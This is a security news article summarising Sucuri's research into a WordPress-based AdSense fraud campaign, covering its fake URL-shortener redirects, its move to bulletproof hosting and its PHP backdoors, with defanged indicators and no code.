AdSense fraud campaign relies on 10,890 sites that were infected since September 2022

The threat actors behind a massive AdSense fraud campaign infected 10,890 WordPress sites since September 2022.

In November 2022, researchers from security firm Sucuri reported to have tracked a surge in WordPress malware redirecting website visitors to fake Q&A sites via ois[.]is. The experts were tracking the campaign since September 2022, the campaign’s end goal was black hat SEO aimed at increasing the reputation of the attacker’s sites.

The Sucuri SiteCheck detected redirects on over 2,500 sites during September and October, while PublicWWW results show nearly 15,000 websites affected by this malware. 

Now experts from Sucuri revealed that since September, their SiteCheck remote scanner has detected this campaign on 10,890 infected sites. The researchers pointed out that the activity has surged with over 70 new malicious domains masquerading as URL shorteners. Since January 2023, over 2,600+ sites have been detected.

The hacked website traffic is redirected to low-quality websites running the Question2Answer CMS. The websites were proposing discussions related to cryptocurrency and blockchain.

The main goal of the threat actors is still ad fraud by generating revenues through traffic redirection to pages containing the AdSense ID used by the threat actors.

“All of the malicious URLs pretend to look like they belong to some URL shortening service. Some of them even mimic names of reputable URL shorteners like Bitly (e.g bitly[.]best, b-i-t-l-y[.]co, bit-ly[.]mobi, etc).” reads the analysis published by Sucuri. “If you enter any of these domain names in a browser, you’ll be redirected to a real URL shortening service: Bitly, Cuttly or ShortUrl.at, which makes it look like they are just alternative domains for the well known services. However, they are not real public URL shorteners — each of the domains has only a few working URLs that redirect visitors to spammy Q&A sites with prominent AdSense monetization.” 

Recently, the threat actors moved all their domains from Cloudflare to the Russian bulletproof hosting services provider DDoS-Guard. All these domains can now be found on IP 190[.]115[.]26.9.

Unlike previous campaigns, this last one also uses redirects through Bing search results URLs and through Twitter short t.co URLs like t[.]co/Xa4ZRqsp8C and t[.]co/KgdLpz31TG.

“Unwanted redirects via fake short URL to fake Q&A sites result in inflated ad views/clicks and therefore inflated revenue for whomever is behind this campaign. It is one very large and ongoing campaign of organised advertising revenue fraud.” continues the analysis.

The analysis of the compromised WordPress sites revealed that threat actors have injected backdoor PHP code to achieve traffic redirection and persistence.

“On some infected sites we also find a similarly obfuscated injection in files like wp-blog-header.php. Website backdoors to maintain unauthorized access. These backdoors download additional shells and a Leaf PHP mailer script from a remote domain filestack[.]live and place them in files with random names in wp-includes,wp-admin and wp-content directories.” concludes the report.

“Since the additional malware injection is lodged within the wp-blog-header.php file it will execute whenever the website is loaded and reinfect the website. This ensures that the environment remains infected until all traces of the malware are dealt with.”

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, AdSense fraud campaign)